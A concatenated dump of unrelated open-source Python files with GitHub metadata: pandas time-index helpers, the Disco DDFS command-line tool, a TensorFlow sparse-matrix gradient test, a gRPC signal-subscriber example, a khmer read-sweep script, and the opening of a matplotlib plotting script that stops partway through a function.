weekmask = kwargs.pop('weekmask', 'Mon Tue Wed Thu Fri')
freq = CDay(holidays=holidays, weekmask=weekmask)
return DatetimeIndex(start=start, end=end, periods=periods, freq=freq,
tz=tz, normalize=normalize, name=name,
closed=closed, **kwargs)
def _to_m8(key, tz=None):
"""
Timestamp-like => dt64
"""
if not isinstance(key, Timestamp):
# this also converts strings
key = Timestamp(key, tz=tz)
return np.int64(tslib.pydt_to_i8(key)).view(_NS_DTYPE)
_CACHE_START = Timestamp(datetime(1950, 1, 1))
_CACHE_END = Timestamp(datetime(2030, 1, 1))
_daterange_cache = {}
def _naive_in_cache_range(start, end):
if start is None or end is None:
return False
else:
if start.tzinfo is not None or end.tzinfo is not None:
return False
return _in_range(start, end, _CACHE_START, _CACHE_END)
def _in_range(start, end, rng_start, rng_end):
return start > rng_start and end < rng_end
def _use_cached_range(offset, _normalized, start, end):
return (offset._should_cache() and
not (offset._normalize_cache and not _normalized) and
_naive_in_cache_range(start, end))
def _time_to_micros(time):
seconds = time.hour * 60 * 60 + 60 * time.minute + time.second
return 1000000 * seconds + time.microsecond
|
{
"content_hash": "e597eb12808b771358ab5eff8a1fbdb1",
"timestamp": "",
"source": "github",
"line_count": 2166,
"max_line_length": 84,
"avg_line_length": 36.340720221606645,
"alnum_prop": 0.5448586020275936,
"repo_name": "andyraib/data-storage",
"id": "024306edef2d8bc16a0ada981d3d8db046dcb192",
"size": "78738",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "python_scripts/env/lib/python3.6/site-packages/pandas/tseries/index.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "12403"
}
],
"symlink_target": ""
}
|
"""
:mod:`ddfs <ddfscli>` -- DDFS command line utility
==================================================
:program:`ddfs` is a tool for manipulating data stored in :ref:`ddfs`.
Some of the :program:`ddfs` utilities also work with data stored in Disco's temporary filesystem.
.. note::
This is the manpage for the :program:`ddfs` command.
Please see :ref:`ddfs` for more general information on DDFS.
.. hint::
The documentation assumes that the executable ``$DISCO_HOME/bin/ddfs`` is on your system path.
If it is not on your path, you can add it::
ln -s $DISCO_HOME/bin/ddfs /usr/local/bin
If ``/usr/local/bin`` is not in your ``$PATH``, use an appropriate replacement.
Doing so allows you to simply call :command:`ddfs`, instead of specifying the complete path.
Run :command:`ddfs help` for information on using the command line utility.
.. seealso::
The :mod:`disco <discocli>` command.
See :mod:`disco.settings` for information about Disco settings.
"""
import fileinput, os, sys
if '.disco-home' in os.listdir('.'):
sys.path.append('lib')
from disco.cli import OptionParser, Program
class DDFS(Program):
pass
@DDFS.command
def attrs(program, tag):
"""Usage: tag
Get the attributes of a tag.
"""
for k, v in program.ddfs.attrs(tag).items():
print '%s\t%s' % (k, v)
@DDFS.add_program_blobs
@DDFS.command
def blobs(program, *tags):
"""Usage: [tag ...]
List all blobs reachable from tag[s].
"""
for replicas in program.blobs(*tags):
print '\t'.join(replicas)
@DDFS.add_job_mode
@DDFS.add_program_blobs
@DDFS.command
def cat(program, *urls):
"""Usage: [url ...]
Concatenate the contents of all url[s] and print to stdout.
If any of the url[s] are tags,
the blobs reachable from the tags will be printed after any non-tag url[s].
"""
from itertools import chain
from subprocess import call
from disco.comm import download
from disco.util import deref, urlresolve, proxy_url
ignore_missing = program.options.ignore_missing
tags, urls = program.separate_tags(*urls)
def curl(replicas):
for replica in replicas:
try:
return download(proxy_url(urlresolve(replica, master=program.ddfs.master),
to_master=False))
except Exception, e:
sys.stderr.write("%s\n" % e)
if not ignore_missing:
raise Exception("Failed downloading all replicas: %s" % replicas)
return ''
for replicas in deref(chain(urls, program.blobs(*tags))):
sys.stdout.write(curl(replicas))
@DDFS.command
def chtok(program, tag, token):
"""Usage: tag token
Change the read/write tokens for a tag.
"""
if program.options.read:
program.ddfs.setattr(tag, 'ddfs:read-token', token)
if program.options.write:
program.ddfs.setattr(tag, 'ddfs:write-token', token)
chtok.add_option('-r', '--read',
action='store_true',
help='change the read token')
chtok.add_option('-w', '--write',
action='store_true',
help='change the write token')
@DDFS.add_classic_reads
@DDFS.add_program_blobs
@DDFS.command
def chunk(program, tag, *urls):
"""Usage: tag [url ...]
Chunks the contents of the urls, pushes the chunks to ddfs and tags them.
"""
from itertools import chain
from disco.util import reify
tags, urls = program.separate_tags(*program.input(*urls))
stream = reify(program.options.stream)
reader = reify(program.options.reader or 'None')
tag, blobs = program.ddfs.chunk(tag,
chain(urls, program.blobs(*tags)),
input_stream=stream,
reader=reader,
replicas=program.options.replicas,
update=program.options.update)
for replicas in blobs:
print 'created: %s' % '\t'.join(replicas)
chunk.add_option('-n', '--replicas',
help='number of replicas to create')
chunk.add_option('-u', '--update',
action='store_true',
help='whether to perform an update or an append')
@DDFS.command
def cp(program, source_tag, target_tag):
"""Usage: source_tag target_tag
Copies one tag to another, overwriting it if it exists.
"""
program.ddfs.put(target_tag, program.ddfs.get(source_tag)['urls'])
@DDFS.command
def delattr(program, tag, attr):
"""Usage: tag attr
Delete an attribute of a tag.
"""
program.ddfs.delattr(tag, attr)
def df(program, *args):
"""Usage: <undefined>
Display statistics about the amount of free space
available on the filesystems of which tag is part of.
"""
raise NotImplementedError("API does not yet support this operation")
def du(program, *args):
"""Usage: <undefined>
Display the disk usage statistics for a tag.
"""
raise NotImplementedError("API does not yet support this operation")
@DDFS.command
def exists(program, tag):
"""Usage: tag
Check if a given tag exists.
Prints 'True' or 'False' and returns the appropriate exit status.
"""
if not program.ddfs.exists(tag):
raise Exception("False")
print "True"
@DDFS.add_ignore_missing
@DDFS.add_prefix_mode
@DDFS.command
def find(program, *tags):
"""Usage: [tag ...]
Walk the tag hierarchy starting at tag[s].
Prints each path as it is encountered.
e.g. to walk all tags with prefix 'data:' and warn about broken links:
ddfs find -wp data:
"""
ignore_missing = program.options.ignore_missing
warn_missing = program.options.warn_missing
if warn_missing:
ignore_missing = True
for tag in program.prefix_mode(*tags):
found = program.ddfs.walk(tag, ignore_missing=ignore_missing)
for tagpath, subtags, blobs in found:
if subtags == blobs == None:
print "Tag not found: %s" % "\t".join(tagpath)
elif subtags == blobs == () and warn_missing:
print "Tag not found: %s" % "\t".join(tagpath)
else:
print '\t'.join(tagpath)
find.add_option('-w', '--warn-missing',
action='store_true',
help='warn about missing tags')
@DDFS.command
def get(program, tag):
"""Usage: tag
Gets the contents of the tag.
"""
print program.ddfs.get(tag)
@DDFS.command
def getattr(program, tag, attr):
"""Usage: tag attr
Get an attribute of a tag.
"""
print program.ddfs.getattr(tag, attr)
def grep(program, *args):
"""Usage: <undefined>
Print lines matching a pattern.
"""
raise NotImplementedError("Distributed grep not yet implemented.")
@DDFS.add_program_blobs
@DDFS.command
def ls(program, *prefixes):
"""Usage: [prefix ...]
List all tags starting with prefix[es].
"""
from disco.error import CommError
for prefix in prefixes or ('', ):
for tag in program.ddfs.list(prefix):
print tag
if program.options.recursive:
try:
blobs(program, tag)
except CommError, e:
print e
print
ls.add_option('-r', '--recursive',
action='store_true',
help='lists the blobs reachable from each tag')
@DDFS.command
def push(program, tag, *files):
"""Usage: tag [file ...]
Push file[s] to DDFS and tag them with the given tag.
"""
replicas = program.options.replicas
tarballs = program.options.tarballs
blobs = [] if tarballs else [file for file in files
if os.path.isfile(file)]
for file in files:
if tarballs:
for name, buf, size in program.ddfs.tarblobs(file,
include=program.options.include,
exclude=program.options.exclude):
print "extracted %s" % name
blobs += [(buf, name)]
elif os.path.isdir(file):
if program.options.recursive:
blobs += [os.path.join(path, blob)
for path, dirs, blobs in os.walk(file)
for blob in blobs]
else:
print "%s is a directory (not pushing)." % file
print "pushing..."
program.ddfs.push(tag, blobs, replicas=replicas)
push.add_option('-E', '--exclude',
help='exclude tar blobs that contain string')
push.add_option('-I', '--include',
help='include tar blobs that contain string')
push.add_option('-n', '--replicas',
help='number of replicas to create')
push.add_option('-r', '--recursive',
action='store_true',
help='recursively push directories')
push.add_option('-x', '--tarballs',
action='store_true',
help='extract files as tarballs')
push.add_option('-z', '--compress',
action='store_true',
help='compress tar blobs when pushing')
@DDFS.command
def put(program, tag, *urls):
"""Usage: tag [url ...]
Put the urls[s] to the given tag.
Urls may be quoted whitespace-separated lists of replicas.
"""
from disco.util import listify
program.ddfs.put(tag, [listify(i) for i in program.input(*urls)])
@DDFS.add_prefix_mode
@DDFS.command
def rm(program, *tags):
"""Usage: [tag ...]
Remove the tag[s].
"""
for tag in program.prefix_mode(*tags):
print program.ddfs.delete(tag)
@DDFS.command
def setattr(program, tag, attr, val):
"""Usage: tag attr val
Set the value of an attribute of a tag.
"""
program.ddfs.setattr(tag, attr, val)
@DDFS.add_prefix_mode
@DDFS.command
def stat(program, *tags):
"""Usage: [tag ...]
Display information about the tag[s].
"""
for tag in program.prefix_mode(*tags):
tag = program.ddfs.get(tag)
print '\t'.join('%s' % tag[key] for key in tag.keys() if key != 'urls')
@DDFS.command
def tag(program, tag, *urls):
"""Usage: tag [url ...]
Tags the urls[s] with the given tag.
Urls may be quoted whitespace-separated lists of replicas.
"""
from disco.util import listify
program.ddfs.tag(tag, [listify(i) for i in program.input(*urls)])
@DDFS.command
def touch(program, *tags):
"""Usage: [tag ...]
Creates the tag[s] if they do not exist.
"""
for tag in tags:
program.ddfs.tag(tag, [])
@DDFS.add_prefix_mode
@DDFS.command
def urls(program, *tags):
"""Usage: [tag ...]
List the urls pointed to by the tag[s].
"""
for tag in program.prefix_mode(*tags):
for replicas in program.ddfs.urls(tag):
print '\t'.join(replicas)
@DDFS.add_job_mode
@DDFS.add_classic_reads
@DDFS.add_program_blobs
@DDFS.command
def xcat(program, *urls):
"""Usage: [urls ...]
Concatenate the extracted results stored in url[s] and print to stdout.
If any of the url[s] are tags,
the blobs reachable from the tags will be printed after any non-tag url[s].
"""
from itertools import chain
from disco.core import classic_iterator
from disco.util import iterify, reify
tags, urls = program.separate_tags(*program.input(*urls))
stream = reify(program.options.stream)
reader = program.options.reader
reader = reify('disco.func.chain_reader' if reader is None else reader)
for record in classic_iterator(chain(urls, program.blobs(*tags)),
input_stream=stream,
reader=reader):
print '\t'.join('%s' % (e,) for e in iterify(record)).rstrip()
if __name__ == '__main__':
DDFS(option_parser=OptionParser()).main()
|
{
"content_hash": "1406e3f2cc5a0501fb323b6383a0b73a",
"timestamp": "",
"source": "github",
"line_count": 400,
"max_line_length": 97,
"avg_line_length": 29.84,
"alnum_prop": 0.596514745308311,
"repo_name": "scrapinghub/disco",
"id": "75fb549bd9cc8e6bde2b2d42e49d316bf4b74524",
"size": "11958",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "bin/ddfscli.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "5550"
},
{
"name": "Erlang",
"bytes": "445047"
},
{
"name": "JavaScript",
"bytes": "44242"
},
{
"name": "Python",
"bytes": "334367"
},
{
"name": "Shell",
"bytes": "5626"
}
],
"symlink_target": ""
}
|
"""CSR sparse matrix tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_grad # pylint: disable=unused-import
from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
def dense_to_csr_sparse_matrix(dense):
dense_t = ops.convert_to_tensor(dense)
locs = array_ops.where(math_ops.abs(dense_t) > 0)
return sparse_csr_matrix_ops.dense_to_csr_sparse_matrix(dense_t, locs)
def _add_test(test, op_name, testcase_name, fn): # pylint: disable=redefined-outer-name
if fn is None:
return
test_name = "_".join(["test", op_name, testcase_name])
if hasattr(test, test_name):
raise RuntimeError("Test %s defined more than once" % test_name)
setattr(test, test_name, fn)
class CSRSparseMatrixGradTest(test.TestCase):
@classmethod
def setUpClass(cls):
super(CSRSparseMatrixGradTest, cls).setUpClass()
cls._gpu_available = test_util.is_gpu_available()
# TODO(penporn): Make these tests runnable on eager mode.
# (tf.gradients and gradient_checker only run in graph mode.)
@test_util.run_deprecated_v1
def testLargeBatchConversionGrad(self):
if not self._gpu_available:
return
sparsify = lambda m: m * (m > 0)
for dense_shape in ([53, 65, 127], [127, 65]):
mats_val = sparsify(np.random.randn(*dense_shape))
with self.test_session() as sess:
mats = math_ops.cast(mats_val, dtype=dtypes.float32)
sparse_mats = dense_to_csr_sparse_matrix(mats)
dense_mats = sparse_csr_matrix_ops.csr_sparse_matrix_to_dense(
sparse_mats, dtypes.float32)
grad_vals = np.random.randn(*dense_shape).astype(np.float32)
grad_out = gradients_impl.gradients([dense_mats], [mats],
[grad_vals])[0]
self.assertEqual(grad_out.dtype, dtypes.float32)
self.assertEqual(grad_out.shape, dense_shape)
grad_out_value = sess.run(grad_out)
tf_logging.info("testLargeBatchConversionGrad: Testing shape %s" %
dense_shape)
nonzero_indices = abs(mats_val) > 0.0
self.assertAllEqual(grad_out_value[nonzero_indices],
grad_vals[nonzero_indices])
self.assertTrue(
np.all(grad_out_value[np.logical_not(nonzero_indices)] == 0.0))
@test_util.run_deprecated_v1
def testLargeBatchSparseConversionGrad(self):
sparsify = lambda m: m * (m > 0)
for dense_shape in ([53, 65, 127], [127, 65]):
mats_val = sparsify(np.random.randn(*dense_shape))
with self.session(use_gpu=True) as sess:
indices = array_ops.where_v2(
math_ops.not_equal(mats_val, array_ops.zeros_like(mats_val)))
values = math_ops.cast(
array_ops.gather_nd(mats_val, indices), dtype=dtypes.float32)
grad_vals = np.random.randn(*sess.run(values).shape).astype(np.float32)
csr_matrix = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix(
indices, values, dense_shape)
new_coo_tensor = (
sparse_csr_matrix_ops.csr_sparse_matrix_to_sparse_tensor(
csr_matrix, type=dtypes.float32))
grad_out = gradients_impl.gradients([new_coo_tensor.values], [values],
[grad_vals])[0]
self.assertEqual(grad_out.dtype, dtypes.float32)
grad_out_vals = sess.run(grad_out)
self.assertAllClose(grad_vals, grad_out_vals)
@test_util.run_deprecated_v1
def testLargeBatchSparseMatrixAddGrad(self):
if not self._gpu_available:
return
sparsify = lambda m: m * (m > 0)
for dense_shape in ([53, 65, 127], [127, 65]):
a_mats_val = sparsify(np.random.randn(*dense_shape))
b_mats_val = sparsify(np.random.randn(*dense_shape))
alpha = np.float32(0.5)
beta = np.float32(-1.5)
grad_vals = np.random.randn(*dense_shape).astype(np.float32)
expected_a_grad = alpha * grad_vals
expected_b_grad = beta * grad_vals
expected_a_grad[abs(a_mats_val) == 0.0] = 0.0
expected_b_grad[abs(b_mats_val) == 0.0] = 0.0
with self.test_session() as sess:
a_mats = math_ops.cast(a_mats_val, dtype=dtypes.float32)
b_mats = math_ops.cast(b_mats_val, dtype=dtypes.float32)
a_sm = dense_to_csr_sparse_matrix(a_mats)
b_sm = dense_to_csr_sparse_matrix(b_mats)
c_sm = sparse_csr_matrix_ops.sparse_matrix_add(
a_sm, b_sm, alpha=alpha, beta=beta)
c_dense = sparse_csr_matrix_ops.csr_sparse_matrix_to_dense(
c_sm, dtypes.float32)
a_grad, b_grad = gradients_impl.gradients([c_dense], [a_mats, b_mats],
[grad_vals])
self.assertEqual(a_grad.dtype, dtypes.float32)
self.assertEqual(b_grad.dtype, dtypes.float32)
self.assertEqual(a_grad.shape, dense_shape)
self.assertEqual(b_grad.shape, dense_shape)
a_grad_value, b_grad_value = sess.run((a_grad, b_grad))
tf_logging.info("testLargeBatchConversionGrad: Testing shape %s" %
dense_shape)
self.assertAllEqual(expected_a_grad, a_grad_value)
self.assertAllEqual(expected_b_grad, b_grad_value)
if __name__ == "__main__":
test.main()
|
{
"content_hash": "e3e0821f2e0cab1ea4830e98e15c674a",
"timestamp": "",
"source": "github",
"line_count": 135,
"max_line_length": 103,
"avg_line_length": 42.55555555555556,
"alnum_prop": 0.6459530026109661,
"repo_name": "sarvex/tensorflow",
"id": "79874ab31b2c43a040d1aeea259fb289d1c1926c",
"size": "6434",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "tensorflow/python/kernel_tests/linalg/sparse/csr_sparse_matrix_grad_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "148184"
},
{
"name": "C++",
"bytes": "6224499"
},
{
"name": "CSS",
"bytes": "107"
},
{
"name": "HTML",
"bytes": "650478"
},
{
"name": "Java",
"bytes": "53519"
},
{
"name": "JavaScript",
"bytes": "6659"
},
{
"name": "Jupyter Notebook",
"bytes": "777935"
},
{
"name": "Objective-C",
"bytes": "1288"
},
{
"name": "Protocol Buffer",
"bytes": "61743"
},
{
"name": "Python",
"bytes": "3474762"
},
{
"name": "Shell",
"bytes": "45640"
},
{
"name": "TypeScript",
"bytes": "283668"
}
],
"symlink_target": ""
}
|
"""This examples shows how to subscribe to a virtual signal in a virtual interface of SignalBroker
This example works with 'virtual_example_pub.py' and it is meant to receive the signals publish from 'virtual_example_pub.py'.
In this code we get the stream of data from the SignalBroker grpc server for the signal: ' input from the console (only 10 times then we stop).
Each time we capture a number we publish it as the value of signal 'virtual_signal' in the 'virtual' namespace.
Make sure you have an interface of type 'virtual' in your config/interfaces.json. Ex.:
{
"default_namespace": "VirtualInterface",
"chains": [
{
"device_name": "virtual",
"namespace": "VirtualInterface",
"type": "virtual"
}
],
"gateway": {
"gateway_pid": "gateway_pid",
"tcp_socket_port": 4040
},
"auto_config_boot_server": {
"port": 4000,
"server_pid": "auto_config_boot_server_pid"
},
"reflectors": [
]
}
"""
import grpc
import sys
sys.path.append('generated')
import network_api_pb2
import network_api_pb2_grpc
import common_pb2
__author__ = "Aleksandar Filipov and Alvaro Alonso"
__copyright__ = "Copyright 2019, Volvo Cars Group"
__version__ = "0.0.1"
__maintainer__ = "Alvaro Alonso"
__email__ = "aalonso@volvocars.com"
__status__ = "Development"
if __name__ == '__main__':
# Create a channel
channel = grpc.insecure_channel('localhost:50051')
# Create the stub
network_stub = network_api_pb2_grpc.NetworkServiceStub(channel)
# Create a signal
namespace = common_pb2.NameSpace(name = "VirtualInterface")
signal = common_pb2.SignalId(name="virtual_signal", namespace=namespace)
# Create a subscriber config
client_id = common_pb2.ClientId(id="virtual_example_sub")
signals = network_api_pb2.SignalIds(signalId=[signal])
sub_info = network_api_pb2.SubscriberConfig(clientId=client_id, signals=signals, onChange=False)
# Subscribe
try:
for response in network_stub.SubscribeToSignals(sub_info):
print(response)
except grpc._channel._Rendezvous as err:
print(err)
|
{
"content_hash": "7629751230a28f2e2fe813f9f1a69eaf",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 143,
"avg_line_length": 32.353846153846156,
"alnum_prop": 0.6875891583452212,
"repo_name": "AleksandarFilipov/signalbroker-server",
"id": "92471d59827c3c6d5af62ce2e51262655526863d",
"size": "2731",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/grpc/python/virtual_example_sub.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "62951"
},
{
"name": "CMake",
"bytes": "2037"
},
{
"name": "Dockerfile",
"bytes": "1598"
},
{
"name": "Elixir",
"bytes": "515791"
},
{
"name": "Makefile",
"bytes": "985"
},
{
"name": "Shell",
"bytes": "94"
}
],
"symlink_target": ""
}
|
"""
Use a set of query reads to sweep out overlapping reads from another file.
% python scripts/sweep-reads2.py <query reads> <search reads>
Results end up in <search reads>.sweep2.
Use '-h' for parameter help.
"""
from __future__ import print_function
import sys
import khmer
import os.path
import screed
from khmer.khmer_args import (build_nodegraph_args, DEFAULT_MAX_TABLESIZE)
def main():
parser = build_construct_args()
parser.add_argument('input_filename')
parser.add_argument('read_filename')
args = parser.parse_args()
if not args.quiet:
if args.min_hashsize == DEFAULT_MAX_TABLESIZE:
print("** WARNING: hashsize is default! " \
"You absodefly want to increase this!\n** " \
"Please read the docs!", file=sys.stderr)
print('\nPARAMETERS:', file=sys.stderr)
print(' - kmer size = %d \t\t(-k)' % args.ksize, file=sys.stderr)
print(' - n hashes = %d \t\t(-N)' % args.n_hashes, file=sys.stderr)
print(' - min hashsize = %-5.2g \t(-x)' % \
args.min_hashsize, file=sys.stderr)
print('', file=sys.stderr)
print('Estimated memory usage is %.2g bytes ' \
'(n_hashes x min_hashsize / 8)' % (
args.n_hashes * args.min_hashsize / 8.), file=sys.stderr)
print('-' * 8, file=sys.stderr)
K = args.ksize
HT_SIZE = args.min_hashsize
N_HT = args.n_hashes
inp = args.input_filename
readsfile = args.read_filename
outfile = os.path.basename(readsfile) + '.sweep2'
outfp = open(outfile, 'w')
# create a nodegraph data structure
ht = khmer.Nodegraph(K, HT_SIZE, N_HT)
# load contigs, connect into N partitions
print('loading input reads from', inp)
ht.consume_fasta(inp)
print('starting sweep.')
n = 0
m = 0
for record in screed.open(readsfile):
if len(record.sequence) < K:
continue
if n % 10000 == 0:
print('...', n, m)
count = ht.get_median_count(record.sequence)[0]
if count:
m += 1
outfp.write('>%s\n%s\n' % (record.name, record.sequence))
n += 1
if __name__ == '__main__':
main()
# vim: set ft=python ts=4 sts=4 sw=4 et tw=79:
|
{
"content_hash": "fc361c53607d531f6c951a774e14bd7e",
"timestamp": "",
"source": "github",
"line_count": 80,
"max_line_length": 79,
"avg_line_length": 28.375,
"alnum_prop": 0.5863436123348018,
"repo_name": "F1000Research/khmer",
"id": "528dd8778a5f83d4c1ed4727a5a80bfcf8cafe70",
"size": "2524",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sandbox/sweep-reads2.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C++",
"bytes": "480168"
},
{
"name": "GLSL",
"bytes": "493"
},
{
"name": "Groff",
"bytes": "8816"
},
{
"name": "Makefile",
"bytes": "16905"
},
{
"name": "Python",
"bytes": "779977"
},
{
"name": "Shell",
"bytes": "4677"
}
],
"symlink_target": ""
}
|
import pickle
import matplotlib as mpl
import matplotlib.pyplot as plt
import os
from examples.lowRankTensorApproximations.fig_pars import set_labels, set_pars
os.nice(19)
def save_experiment_settings(kind_list, Ns, kinds, sol_rank_range_set, material_list,
data_folder='data_for_plot'):
if not os.path.exists('{}'.format(data_folder)):
os.makedirs('{}/'.format(data_folder))
for dim in [2, 3]:
for material in material_list:
if not os.path.exists('{}/dim_{}/mat_{}/'.format(data_folder, dim, material)):
os.makedirs('{}/dim_{}/mat_{}/'.format(data_folder, dim, material))
pickle.dump(kind_list, open("{}/kind_list.p".format(data_folder), "wb"))
pickle.dump(Ns, open("{}/Ns.p".format(data_folder), "wb"))
pickle.dump(kinds, open("{}/kinds.p".format(data_folder), "wb"))
pickle.dump(sol_rank_range_set, open("{}/sol_rank_range_set.p".format(data_folder), "wb"))
pickle.dump(material_list, open("{}/material_list.p".format(data_folder), "wb"))
return
def load_experiment_settings(data_folder='data_for_plot'):
material_list = pickle.load(open("{}/material_list.p".format(data_folder), "rb"))
sol_rank_range_set = pickle.load(open("{}/sol_rank_range_set.p".format(data_folder), "rb"))
kinds = pickle.load(open("{}/kinds.p".format(data_folder), "rb"))
Ns = pickle.load(open("{}/Ns.p".format(data_folder), "rb"))
kind_list = pickle.load(open("{}/kind_list.p".format(data_folder), "rb"))
solver = 'mr'
return material_list, sol_rank_range_set, kinds, Ns, kind_list, solver
def plot_error():
data_folder = "data_for_plot/error"
material_list, sol_rank_range_set, kinds, Ns, kind_list, solver = load_experiment_settings(
data_folder=data_folder)
ylimit = [10**-11, 10**0]
xlabel = 'rank of solution'
ylabel = 'relative error'
for dim in [2]:
N = max(Ns['{}'.format(dim)])
xlimend = max(sol_rank_range_set['{}'.format(dim)])
if not os.path.exists('figures'):
os.makedirs('figures')
##### BEGIN: figure 1 resiguum(solution rank) ###########
for material in material_list:
parf = set_pars(mpl)
lines, labels = set_labels()
src = 'figures/' # source folder\
plt.figure(num=None, figsize=parf['figsize'], dpi=parf['dpi'])
plt.ylabel('relative error')
plt.xlabel('rank of solution')
sol_rank_range = sol_rank_range_set['{}'.format(dim)]
i = 0
for kind in kinds['{}'.format(dim)]:
sols_Ga = pickle.load(open("{}/dim_{}/mat_{}/sols_Ga_{}.p".format(data_folder, dim, material, N), "rb"))
sols_GaNi = pickle.load(
open("{}/dim_{}/mat_{}/sols_GaNi_{}.p".format(data_folder, dim, material, N), "rb"))
sols_Ga_Spar = pickle.load(
open("{}/dim_{}/mat_{}/sols_Ga_Spar_{}_{}_{}.p".format(data_folder, dim, material, kind, N, solver),
"rb"))
sols_GaNi_Spar = pickle.load(
open("{}/dim_{}/mat_{}/sols_GaNi_Spar_{}_{}_{}.p".format(data_folder, dim, material, kind, N,
solver),
"rb"))
plt.semilogy(sol_rank_range,
[abs((sols_Ga_Spar[i]-sols_Ga[1])/sols_Ga[1]) for i in range(len(sols_Ga_Spar))],
lines['Ga_{}'.format(kind_list[kind])][i], label=labels['Ga{}'.format(kind_list[kind])],
markevery=1)
plt.semilogy(sol_rank_range,
[abs((sols_GaNi_Spar[i]-sols_GaNi[1])/sols_GaNi[1]) for i in range(len(sols_GaNi_Spar))],
lines['GaNi_{}'.format(kind_list[kind])][i],
label=labels['GaNi{}'.format(kind_list[kind])], markevery=1, markersize=7,
markeredgewidth=1, markerfacecolor='None')
i = i + 1
ax = plt.gca()
plt.xlabel(xlabel)
ax.set_xlim([0, xlimend])
ax.set_ylim(ylimit)
plt.xticks(sol_rank_range)
plt.ylabel(ylabel)
plt.legend(loc='best')
fname = src + 'Error_dim{}_mat{}_{}_N{}{}'.format(dim, material, solver, N, '.pdf')
print(('create figure: {}'.format(fname)))
plt.savefig(fname, dpi=parf['dpi'], pad_inches=parf['pad_inches'], bbox_inches='tight')
print('END plot errors 2D')
##### END: figure 1 resiguum(solution rank) ###########
for dim in [3]:
N = max(Ns['{}'.format(dim)])
xlimend = max(sol_rank_range_set['{}'.format(dim)])
if not os.path.exists('figures'):
os.makedirs('figures')
##### BEGIN: figure 1 resiguum(solution rank) ###########
for material in material_list:
parf = set_pars(mpl)
lines, labels = set_labels()
src = 'figures/' # source folder\
plt.figure(num=None, figsize=parf['figsize'], dpi=parf['dpi'])
sol_rank_range = sol_rank_range_set['{}'.format(dim)]
i = 0
for kind in kinds['{}'.format(dim)]:
sols_Ga = pickle.load(
open("data_for_plot/error/dim_{}/mat_{}/sols_Ga_{}.p".format(dim, material, N), "rb"))
sols_GaNi = pickle.load(
open("{}/dim_{}/mat_{}/sols_GaNi_{}.p".format(data_folder, dim, material, N), "rb"))
sols_Ga_Spar = pickle.load(
open("{}/dim_{}/mat_{}/sols_Ga_Spar_{}_{}_{}.p".format(data_folder, dim, material, kind, N, solver),
"rb"))
sols_GaNi_Spar = pickle.load(
open("{}/dim_{}/mat_{}/sols_GaNi_Spar_{}_{}_{}.p".format(data_folder, dim, material, kind, N,
solver),
"rb"))
plt.semilogy(sol_rank_range,
[abs((sols_Ga_Spar[i]-sols_Ga[1])/sols_Ga[1]) for i in range(len(sols_Ga_Spar))],
lines['Ga_{}'.format(kind_list[kind])][i], label=labels['Ga{}'.format(kind_list[kind])],
markevery=1)
plt.semilogy(sol_rank_range,
[abs((sols_GaNi_Spar[i]-sols_GaNi[1])/sols_GaNi[1]) for i in range(len(sols_Ga_Spar))],
lines['GaNi_{}'.format(kind_list[kind])][i],
label=labels['GaNi{}'.format(kind_list[kind])], markevery=1, markersize=7,
markeredgewidth=1, markerfacecolor='None')
ax = plt.gca()
plt.xlabel(xlabel)
ax.set_xlim([0, xlimend])
plt.xticks(sol_rank_range)
ax.set_ylim(ylimit)
plt.ylabel(ylabel)
plt.legend(loc='best')
fname=src+'Error_dim{}_mat{}_{}_N{}{}'.format(dim, material, solver, N, '.pdf')
print(('create figure: {}'.format(fname)))
plt.savefig(fname, dpi=parf['dpi'], pad_inches=parf['pad_inches'], bbox_inches='tight')
print('END plot errors 3D')
##### END: figure 1 resiguum(solution rank) ###########
def plot_memory():
material_list, sol_rank_range_set, kinds, Ns, kind_list, solver = load_experiment_settings()
xlabel = 'rank of solution'
ylabel = 'memory efficiency'
if not os.path.exists('figures'):
os.makedirs('figures')
for dim in [2]:
sol_rank_range = sol_rank_range_set['{}'.format(dim)]
N = max(Ns['{}'.format(dim)])
xlimend = max(sol_rank_range_set['{}'.format(dim)])
##### BEGIN: figure 2 Memory efficiency ###########
for material in material_list:
parf = set_pars(mpl)
lines, labels = set_labels()
src = 'figures/' # source folder\
plt.figure(num=None, figsize=parf['figsize'], dpi=parf['dpi'])
mem_GaNi = pickle.load(open("data_for_plot/dim_{}/mat_{}/mem_GaNi_{}.p".format(dim, material, N, ), "rb"))
plt.semilogy(sol_rank_range, mem_GaNi, lines['full'],
label=labels['GaNi{}'.format(('full'))], markevery=1, markersize=7,
markeredgewidth=1, markerfacecolor='None')
for N in Ns['{}'.format(dim)]:
i = 0
for kind in kinds['{}'.format(dim)]:
mem_GaNi_Spar = pickle.load(open(
"data_for_plot/dim_{}/mat_{}/mem_GaNi_Spar_{}_{}_{}.p".format(dim, material, kind, N, solver),
"rb"))
plt.semilogy(sol_rank_range, mem_GaNi_Spar, lines['mem_{}'.format(kind_list[kind])][i],
label='{}{}'.format(labels['GaNi{}N'.format(kind_list[kind])], N),
markevery=1, markersize=7, markeredgewidth=1,
markerfacecolor='None')
i = i + 1
ax = plt.gca()
plt.xticks(sol_rank_range)
plt.xlabel(xlabel)
ax.set_xlim([0, xlimend])
plt.ylabel(ylabel)
plt.legend(loc='best')
fname=src+'Memory_dim{}_mat{}{}'.format(dim, material, '.pdf')
print(('create figure: {}'.format(fname)))
